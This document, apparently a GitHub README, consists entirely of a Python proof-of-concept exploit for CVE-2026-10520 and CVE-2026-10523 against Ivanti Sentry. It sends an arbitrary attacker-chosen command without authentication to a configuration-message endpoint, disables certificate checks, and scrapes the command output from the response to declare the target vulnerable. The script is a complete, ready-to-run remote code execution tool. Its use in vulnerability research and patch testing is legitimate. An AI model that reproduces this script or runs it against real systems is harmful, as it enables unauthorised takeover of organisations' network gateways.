README.md
Rendering markdown...
#!/usr/bin/env python3
import sys
import requests
import re
import argparse
import urllib3
from urllib.parse import urljoin
banner = r"""
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
"""
def make_command_request(base_url, command, proxies=None):
"""Send the command execution request."""
url = urljoin(base_url.rstrip("/") + "/", "mics/api/v2/sentry/mics-config/handleMessage")
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (compatible; 0xBlackash-Exploit/1.0)",
}
data = {
"message": (
"execute system /configuration/system/commandexec "
f"<commandexec><index>1</index><reqandres>{command}</reqandres></commandexec>"
)
}
print(f"[+] Sending command to: {url}")
return requests.post(
url,
headers=headers,
data=data,
timeout=15,
proxies=proxies,
verify=False,
allow_redirects=False,
)
def extract_command_output(response):
"""Extract command output from response."""
body = response.text
try:
parsed = response.json()
data = parsed.get("data", body)
except ValueError:
data = body
# Multiple fallback patterns
patterns = [
r"<result><success>(.*?)</success></result>",
r"<success>(.*?)</success>",
r"Message handled successfully.*?(.*?)",
]
for pattern in patterns:
match = re.search(pattern, data, re.DOTALL | re.IGNORECASE)
if match:
return match.group(1).strip()
return None
def main():
print(banner)
parser = argparse.ArgumentParser(
description='CVE-2026-10520 PoC - Ivanti Sentry Pre-Auth RCE by Ashraf Zaryouh "0xBlackash"'
)
parser.add_argument('--url', required=True, help='Target URL (e.g. https://target.com:8443)')
parser.add_argument('--cmd', required=True, help='Command to execute (e.g. "id", "whoami", "uname -a")')
parser.add_argument('--proxy', help='HTTP proxy (e.g. 127.0.0.1:8080)')
parser.add_argument('-v', '--verbose', action='store_true', help='Verbose output')
args = parser.parse_args()
base_url = args.url.rstrip('/')
proxies = {'http': f'http://{args.proxy}', 'https': f'http://{args.proxy}'} if args.proxy else None
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print("=" * 70)
print(f"Target : {base_url}")
print(f"Command: {args.cmd}")
if proxies:
print(f"Proxy : {args.proxy}")
print("=" * 70)
try:
response = make_command_request(base_url, args.cmd, proxies)
if args.verbose:
print(f"[DEBUG] Status Code: {response.status_code}")
print(f"[DEBUG] Response Length: {len(response.text)}")
output = extract_command_output(response)
if output:
print("\n[+] Target is VULNERABLE!")
print("\nCommand Output:")
print("-" * 50)
print(output)
print("-" * 50)
else:
print("\n[-] Target does NOT appear to be vulnerable or command failed.")
if args.verbose:
print("\nRaw Response:")
print(response.text[:1000])
except requests.exceptions.RequestException as e:
print(f"\n[-] Request error: {e}")
except Exception as e:
print(f"\n[-] Unexpected error: {e}")
print("\n[*] Exploit by Ashraf Zaryouh \"0xBlackash\"")
if __name__ == "__main__":
main()